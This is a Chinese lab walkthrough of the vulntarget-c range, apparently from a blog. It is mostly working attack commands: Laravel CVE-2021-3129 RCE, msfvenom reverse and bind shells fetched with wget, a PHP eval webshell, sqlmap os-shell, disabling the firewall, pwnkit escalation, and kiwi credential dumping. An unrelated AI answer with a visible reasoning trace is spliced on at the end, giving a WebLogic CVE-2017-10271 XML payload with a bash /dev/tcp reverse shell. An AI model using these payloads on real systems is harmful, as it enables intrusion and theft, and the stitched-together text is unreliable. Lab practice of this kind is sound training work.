[vulntarget靶场] vulntarget-c

靶场地址: https://github.com/crow821/vulntarget

拓扑结构

在这里插入图片描述

信息收集

主机发现

netdiscover -r 192.168.111.0/24 -i eth0

在这里插入图片描述

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.131

在这里插入图片描述

访问80端口,发现为Laravel v8.78.1框架

在这里插入图片描述

vulmap探测发现Laravel v8.78.1存在CVE-2021-3129远程代码执行

在这里插入图片描述

漏洞利用

https://github.com/SNCKER/CVE-2021-3129		#exp
https://github.com/ambionics/phpggc			#exp执行需要的工具

修改exp

在这里插入图片描述

在这里插入图片描述

执行exp

在这里插入图片描述

上传msf反弹shell

#生成反弹shell
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.111.111 lport=5555 -f elf -o shell.elf

#本地开启python的http服务
python3 -m http.server

#在目标上下载反弹shell
wget http://192.168.111.111:8000/shell.elf
chmod 777 shell.elf
./shell.elf

在这里插入图片描述

开启msf监听

handler -H 192.168.111.111 -P 5555 -p linux/x64/meterpreter/reverse_tcp

在这里插入图片描述

提权

利用msf模块post/multi/recon/local_exploit_suggester收集可用于提权的模块

run post/multi/recon/local_exploit_suggester

在这里插入图片描述

执行exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec模块进行提权

run exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec lhost=192.168.111.111 lport=5555

在这里插入图片描述

添加路由

run post/multi/manage/autoroute

在这里插入图片描述

开启socks代理

use auxiliary/server/socks_proxy
run

在这里插入图片描述

内网信息收集

win2016

发现存活主机10.0.20.100

proxychains4 nmap -Pn -sT -p21,22,23,80-90,161,389,443,445,873,1099,1433,1521,1900,2082,2083,2222,2601,2604,3128,3306,3311,3312,3389,4440,4848,5432,5560,5900,5901,5902,6082,6379,7001-7010,7778,8080-8090,8649,8888,9000,9200,10000,11211,27017,28017,50000,50030,50060,135,139,445,53,88 10.0.20.0/24

在这里插入图片描述

利用代理访问10.0.20.100的80端口

在这里插入图片描述

在这里插入图片描述

尝试弱口令admin/admin123,登录后台

在这里插入图片描述

漏洞利用

后台修改用户信息的位置存在sql注入

在这里插入图片描述

利用sqlmap拿shell

proxychains4 sqlmap -u 'http://10.0.20.100/admin/?page=user/manage_user&id=3' --cookie 'PHPSESSID=3o55c0sch68klrlfqub93hldta' --random-agent --os-shell

在这里插入图片描述

写入webshell

echo ^<^?php $a='asdf';$$a=$_POST['cmd'];eval($asdf);?^>^ > a.php

在这里插入图片描述

在这里插入图片描述

哥斯拉连接

proxychains4 java -jar godzilla.jar

在这里插入图片描述

上传免杀后的msf_bind_shell

#将免杀的bind_shell利用哥斯拉上传到目标
msfvenom -p windows/x64/meterpreter/bind_tcp rhost=10.0.20.100 lport=4444 -f exe -o shell.exe

#关闭防火墙
netsh advfirewall set allprofiles state off

#设置监听
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set rhost 10.0.20.100
run

#添加路由
run post/multi/manage/autoroute

在这里插入图片描述

发现存活主机10.0.10.110

proxychains4 nmap -Pn -sT -p21,22,23,80-90,161,389,443,445,873,1099,1433,1521,1900,2082,2083,2222,2601,2604,3128,3306,3311,3312,3389,4440,4848,5432,5560,5900,5901,5902,6082,6379,7001-7010,7778,8080-8090,8649,8888,9000,9200,10000,11211,27017,28017,50000,50030,50060,135,139,445,53,88 10.0.10.0/24

在这里插入图片描述

利用kiwi模块抓取hash

load kiwi
creds_all

在这里插入图片描述

ntlm解密:https://www.somd5.com/

在这里插入图片描述

ubuntu16

开3389连接,账号:administrator,密码:Admin#123

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

在这里插入图片描述

proxychains4 remmina

在这里插入图片描述

在任务栏发现远程连接工具

在这里插入图片描述

连接到发现的主机10.0.10.110

在这里插入图片描述

查看MobaXterm已存储的账号密码

用户:vulntarget
密码:vuln@qwe

在这里插入图片描述

利用sudo提权

sudo -l
sudo su

在这里插入图片描述

或者上传msf_bind_shell,利用post/multi/recon/local_exploit_suggester模块收集可用于提权的模块

#生成linux正向shell,先上传到win2016再利用MobaXterm上传到Ubuntu16
msfvenom -p linux/x64/meterpreter/bind_tcp rhost=10.0.10.110 lport=4444 -f elf -o shell.elf

#设置监听
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 10.0.10.110
run

在这里插入图片描述

run post/multi/recon/local_exploit_suggester

在这里插入图片描述

exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec提权

use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
set session 5
set AutoCheck false
set payload linux/x64/meterpreter/bind_tcp
set rhost 10.0.10.110
set lport 5555
run

在这里插入图片描述

<think>好的,用户想了解在Vulhub靶场上设置或利用CVE-2017-10271漏洞的方法。首先,我需要回忆一下这个漏洞的基本情况。CVE-2017-10271是WebLogic的一个远程代码执行漏洞,由于XML反序列化处理不当导致攻击者可以发送恶意请求执行任意命令。 接下来,用户提到的是Vulhub靶场,所以我需要确认Vulhub是否包含这个漏洞的环境。根据提供的引用内容,引用[4]提到了weblogic cve-2017-10271漏洞复现,但用户提供的引用中并没有直接给出Vulhub的配置步骤,而是提到了vulfocus。可能用户混淆了不同靶场,但Vulhub确实有多个WebLogic漏洞的环境,需要检查是否存在CVE-2017-10271的具体配置。 首先,用户需要搭建Vulhub环境。通常步骤是安装Docker和docker-compose,然后从Vulhub的GitHub仓库下载环境。接着在对应漏洞目录下启动容器。假设Vulhub中有该漏洞的环境,用户需要进入对应的目录,比如vulhub/weblogic/CVE-2017-10271,执行docker-compose up -d启动环境。 然后是漏洞利用部分。该漏洞利用通常涉及发送构造的XML请求到WebLogic的wls-wsat组件。使用工具如curl或Python脚本发送恶意HTTP POST请求,其中包含反序列化payload,比如通过XML中嵌入Java代码执行命令。例如,用户可能使用反弹shell的命令,将bash -i重定向到攻击者的监听端口。 需要注意的地方包括确保靶场环境正确启动,端口开放,以及替换利用代码中的IP和端口为实际的攻击机地址。此外,测试完毕后要关闭环境,避免留下安全隐患。 用户可能遇到的问题包括环境配置错误、依赖未安装,或者利用代码的格式问题。需要提醒用户检查Docker服务状态,确认目录正确,以及利用代码中的特殊字符是否正确转义。 最后,按照用户要求生成相关问题,可能需要涵盖漏洞原理、其他相关漏洞、防护措施以及调试方法等。</think>### Vulhub靶场中CVE-2017-10271漏洞配置与利用方法 #### 环境搭建步骤 1. **安装Docker与Vulhub** 确保系统已安装Docker和docker-compose,通过以下命令拉取Vulhub漏洞库: ```bash git clone https://github.com/vulhub/vulhub.git cd vulhub/weblogic/CVE-2017-10271 docker-compose up -d ``` 启动后,WebLogic服务将运行在`http://靶机IP:7001`。 2. **验证环境** 访问`http://靶机IP:7001/console`,若出现WebLogic登录页面,则环境搭建成功[^4]。 --- #### 漏洞利用方法 1. **构造恶意请求** 漏洞存在于`wls-wsat`组件的XML反序列化处理。通过发送包含恶意代码的POST请求触发漏洞。 **示例Payload**(反弹Shell): ```http POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: 靶机IP:7001 Content-Type: text/xml <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"><string>/bin/bash</string></void> <void index="1"><string>-c</string></void> <void index="2"><string>bash -i >& /dev/tcp/攻击机IP/监听端口 0>&1</string></void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope> ``` 2. **启动监听并触发漏洞** - 攻击机上执行: ```bash nc -lvp 监听端口 ``` - 发送上述Payload至目标服务器,成功后将在攻击机获得Shell权限。 --- #### 关键注意事项 1. **特殊字符转义** XML中需对`&`, `>`等符号转义,例如将`>`替换为`&gt;`,否则请求会因格式错误被拒绝。 2. **环境清理** 测试完成后执行: ```bash docker-compose down ``` --- #### 漏洞原理分析 CVE-2017-10271因WebLogic的`wls-wsat`组件未严格过滤XML输入,导致攻击者可通过反序列化操作执行任意Java代码。其核心问题在于`XMLDecoder`未对输入数据做安全检查[^4]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值